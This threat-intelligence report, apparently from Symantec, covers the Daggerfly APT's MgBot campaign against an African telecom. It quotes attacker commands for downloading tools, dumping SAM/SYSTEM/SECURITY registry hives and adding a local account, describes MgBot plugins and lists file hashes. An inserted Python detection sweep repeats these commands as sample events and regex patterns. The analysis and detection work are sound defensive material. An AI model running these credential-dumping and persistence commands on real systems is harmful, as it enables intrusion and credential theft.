
Daggerfly: APT Actor Targets Telecoms Company in Africa

New MgBot malware framework plugins deployed in recent campaign.

A telecommunications organization in Africa appears to be among the latest targets for the Daggerfly (aka Evasive Panda, Bronze Highland) advanced persistent threat (APT) group, with the group’s most recent campaign using previously unseen plugins from the MgBot malware framework.

The first indications of malicious activity on this victim’s network were seen in November 2022, but there are indications the activity is likely still ongoing. Researchers from the Threat Hunter Team at Symantec, by Broadcom Software, found multiple unique plugins associated with the MgBot modular malware framework on the victim’s network. The attackers were also seen using a PlugX loader and abusing the legitimate AnyDesk remote desktop software. Use of the MgBot modular malware framework and the PlugX loader has been associated in the past with China-linked APTs.

Association between this activity and Daggerfly is based in part on details in a 2020 blog about activity that Malwarebytes attributed to Evasive Panda. Crossovers in the activity included:

  • One of the MgBot samples found appears in both sets of activity
  • Both sets of activity include a renamed Rundll32.exe file named "dbengin.exe" in the ProgramData\Microsoft\PlayReady directory
  • The loader DLL "pMsrvd.dll" in the csidl_common_appdata\microsoft\playready\mdie942.tmp directory appears in both sets of activity

The folders and file names used in this recent activity, as well as the use of DLL side-loading, also support the attribution. The activity documented by Malwarebytes occurred in 2020, and Daggerfly is believed to have been active since at least 2014.


Attack Chain

Suspicious AnyDesk connections spotted on a Microsoft Exchange mail server in November 2022 were among the first signs of malicious activity on the victim network in this recent Daggerfly campaign. AnyDesk is legitimate remote desktop software, but it is commonly abused by threat actors for remote access and other purposes.

The WannaMine crypto-mining malware was also seen on the same Exchange server, though it appears likely that this activity was not linked to the Daggerfly group. The presence of WannaMine does, however, indicate that the server it was found on may have been unpatched and vulnerable to the EternalBlue exploit, as well as to more recent exploits targeting this server.

The legitimate, free Rising antivirus software was also used to side-load the PlugX loader onto victim machines.

We will go through the attack chain in further detail below.

File downloads

Threat actors used the living-off-the-land tools BITSAdmin and PowerShell to download files onto victim systems. The attackers downloaded the legitimate AnyDesk executable and the GetCredManCreds tool in this way.

Commands used by the attackers to download remote desktop access tools onto victim machines
bitsadmin /transfer d7d3 CSIDL_COMMON_APPDATA\anydesk.exe
"CSIDL_SYSTEM\windowspowershell\v1.0\powershell.exe" Invoke-WebRequest -Uri -OutFile CSIDL_COMMON_APPDATA\anydesk.exe

Credential dumping

The attackers used the previously downloaded GetCredManCreds script to retrieve the usernames and passwords of web services stored in the credential manager using PowerShell.

Commands used by the attackers to download credential dumping tools onto victim machines
"CSIDL_SYSTEM\windowspowershell\v1.0\powershell.exe" Invoke-WebRequest -Uri -OutFile CSIDL_COMMON_APPDATA\a.ps1

They also dumped the SAM (Security Account Manager), System, and Security hives of the Windows registry using the reg.exe tool. This allowed the adversaries to extract credentials from the SAM database.

Commands used by the attackers to steal credentials
"CSIDL_SYSTEM\reg.exe" save hklm\sam
"CSIDL_SYSTEM\reg.exe" save hklm\system
"CSIDL_SYSTEM\reg.exe" save hklm\security

Persistence with local account

Daggerfly also created a local account to maintain access to victim systems with the following command line:

"CSIDL_SYSTEM\net.exe" user [REDACTED] Pqssword1 /add
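The download, credential-dumping and local-account command lines above, together with the renamed Rundll32.exe (dbengin.exe) and pMsrvd.dll loader in the PlayReady directory used for attribution, map directly onto process-creation telemetry. The following detection sweep is an added example and not Symantec's code; the events, host names, URLs and the user name are constructed placeholders, and only the command-line shapes and file names come from the report.

```python
import re
from collections import defaultdict

# Constructed process-creation events (Sysmon Event ID 1 / Security 4688 style);
# hosts, paths and URLs are placeholders, not indicators from the report.
SAMPLE_EVENTS = [
    {"host": "MAIL01", "image": r"C:\Windows\System32\bitsadmin.exe",
     "cmdline": r"bitsadmin /transfer d7d3 https://placeholder.invalid/a.exe C:\ProgramData\anydesk.exe"},
    {"host": "MAIL01", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe Invoke-WebRequest -Uri https://placeholder.invalid/a.ps1 -OutFile C:\ProgramData\a.ps1"},
    {"host": "MAIL01", "image": r"C:\Windows\System32\reg.exe",
     "cmdline": r"reg.exe save hklm\sam C:\ProgramData\sam.hiv"},
    {"host": "MAIL01", "image": r"C:\Windows\System32\net.exe",
     "cmdline": r"net.exe user placeholder_user Pqssword1 /add"},
    {"host": "WS07", "image": r"C:\ProgramData\Microsoft\PlayReady\dbengin.exe",
     "cmdline": r"dbengin.exe C:\ProgramData\Microsoft\PlayReady\mdie942.tmp\pMsrvd.dll"},
    {"host": "WS12", "image": r"C:\Windows\System32\reg.exe",   # benign admin query
     "cmdline": r"reg.exe query hkcu\software\microsoft\windows\currentversion\run"},
]

# (rule name, event field, pattern); Windows paths are case-insensitive.
RULES = [
    ("bitsadmin_transfer_to_programdata", "cmdline",
     re.compile(r"\bbitsadmin(\.exe)?\s+/transfer\b.*\\ProgramData\\", re.I)),
    ("powershell_webrequest_outfile", "cmdline",
     re.compile(r"\bInvoke-WebRequest\b.*\s-OutFile\b", re.I)),
    ("reg_save_credential_hive", "cmdline",
     re.compile(r"\breg(\.exe)?\s+save\s+hklm\\(sam|system|security)\b", re.I)),
    ("net_user_add_local_account", "cmdline",
     re.compile(r"\bnet1?(\.exe)?\s+user\s+\S+\s+\S+\s+/add\b", re.I)),
    # Executables do not normally run from the PlayReady data directory; the
    # report ties a renamed rundll32 (dbengin.exe) there to Daggerfly.
    ("exe_in_playready_dir", "image",
     re.compile(r"\\ProgramData\\Microsoft\\PlayReady\\[^\\]+\.exe$", re.I)),
    ("pmsrvd_sideload", "cmdline", re.compile(r"\bpMsrvd\.dll\b", re.I)),
]


def match_rules(event):
    """Return the names of every rule the event triggers, in RULES order."""
    return [name for name, field, pat in RULES if pat.search(event.get(field, ""))]


def triage(events, min_stages=2):
    """Group hits per host and keep hosts showing at least min_stages distinct
    TTPs: a single hit (an admin saving a hive) is weak evidence on its own."""
    hits = defaultdict(set)
    for ev in events:
        hits[ev["host"]].update(match_rules(ev))
    return {host: sorted(rules) for host, rules in hits.items() if len(rules) >= min_stages}
```

Run on the constructed sample, `triage` flags MAIL01 (all four attack-chain stages) and WS07 (the PlayReady side-loading pair) while WS12's routine `reg query` produces no hit.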

MgBot modular malware framework

MgBot is a well-designed modular framework that is actively maintained. The components of the framework are the following:

  • MgBot EXE dropper
  • MgBot DLL Loader
  • MgBot Plugins

The MgBot plugins that were deployed in this activity have numerous capabilities that can provide the attackers with a significant amount of information about compromised machines. Among the unique plugins that were deployed during this activity were:

  • Network scanner – innocence.dll
    • Capabilities include: arp scan, http scan, determining the type of server (e.g. SQL, WebLogic, Redis, etc.) it is running on.
  • A Chrome and Firefox infostealer that can gather information such as bookmarks and browsing history – bkmk.dll
  • Logging module – famdowm.dll
    • Based on the open-source easylogging++, which can carry out basic logging, track performance and more.
  • QQ messages infostealer – qmsdp.dll
    • Based on this blog, which details how a chat tool message database was cracked by hackers.
  • Active Directory enumeration – ceeeb.dll
    • Collects the following information from Active Directory:
      • Members info
      • Computers
      • Local Admins
      • Remote Desktop Users
      • DCOM Users
  • Password dumper – cpfwplgx.dll
    • Drops a file that calls the MiniDumpWriteDump API to dump a process's memory.
  • QQ Keylogger – kstrcs.dll
    • Keylogger that targets QQEdit.exe and QQ.exe processes.
  • Screen and clipboard grabber – cbmrpa.dll
    • Captures clipboard and drag and drop data and saves it to a file.
  • Outlook and Foxmail credentials stealer – maillfpassword.dll
  • Audio capture – prsm.dll
    • Captures audio from the infected system.
    • Uses the COM interfaces IMMDeviceEnumerator and IAudioCaptureClient.
  • Process Watchdog – ansecprocesskeep.dll
    • Registered as service AnsecProcessKeep.
    • Confirmed to be a watchdog that keeps a process running.
    • The process name is found in an .ini file.

All of these capabilities would have allowed the attackers to collect a significant amount of information from victim machines. The capabilities of these plugins also show that the main goal of the attackers during this campaign was information-gathering.

Daggerfly’s development of these previously unseen plugins demonstrates that the attack group is continuing to actively develop its malware and the tools it can use to target victim networks.


Continuation of a Trend

Telecoms companies will always be a key target in intelligence gathering campaigns due to the access they can potentially provide to the communications of end-users.

Symantec’s Threat Hunter team also spotted some other recent activity targeting telecoms companies that was linked with moderate confidence to the threat actor Othorene (aka Gallium), in what appeared to be a continuation of an intelligence-gathering campaign first reported on by SentinelOne under the name Operation Tainted Love in March. SentinelOne reported that in that campaign Othorene was targeting telecoms companies in the Middle East.

Othorene has been active since around 2014, and it is believed to be a relatively small group that has a strong focus on the surveillance of individuals. There are also some indications that Othorene may have links with the APT41 (aka Blackfly, Grayfly) APT group. Overlap of both personnel and tactics, techniques, and procedures (TTPs) among Chinese APT groups is not uncommon, and can make attributing activity to one group with high confidence difficult.

In the activity Symantec saw, we found three additional victims of the same campaign that SentinelOne detailed, located in Asia and Africa. Two of the three were subsidiaries of the same Middle Eastern telecoms firm. The attackers had been active on victim networks since November 2022. Symantec saw attackers dumping credentials and scanning the network using NbtScan.

The main malware (pc.exe, dubbed mim221) in this campaign was used to dump credentials, and it had the same password as the malware used in the activity documented by SentinelOne. The attackers also moved laterally across victims’ networks, used scheduled tasks for persistence, and dumped the SAM and System hives from the registry. There were indications that the attackers may have exported the Active Directory database on victim machines, and they were also able to gain access to domain controllers, giving them deep access to victim networks.



For the latest protection updates, please visit the Symantec Protection Bulletin.


Indicators of Compromise

If an IOC is malicious and the file is available to us, Symantec Endpoint products will detect and block that file.


File Indicators – Daggerfly

MgBot Dropper

MgBot – aasrvd.dll, pmsrvd.dll

MgBot Plugins
29df6c3f7d13b259b3bc5d56f2cdd14782021fc5f9597a3ccece51ffac2010a0
ea2be3d0217a2efeb06c93e32f489a457bdea154fb4a900f26bef83e2053f4fd

PlugX Loader – proccom.dll, djcu.dll

DumpCredStore – dumpcredstore.ps1, a.ps1

AnyDesk – anydesk.exe



File Indicators – Othorene


About the Author

Threat Hunter Team


The Threat Hunter Team is a group of security experts within Symantec whose mission is to investigate targeted attacks, drive enhanced protection in Symantec products, and offer analysis that helps customers respond to attacks.
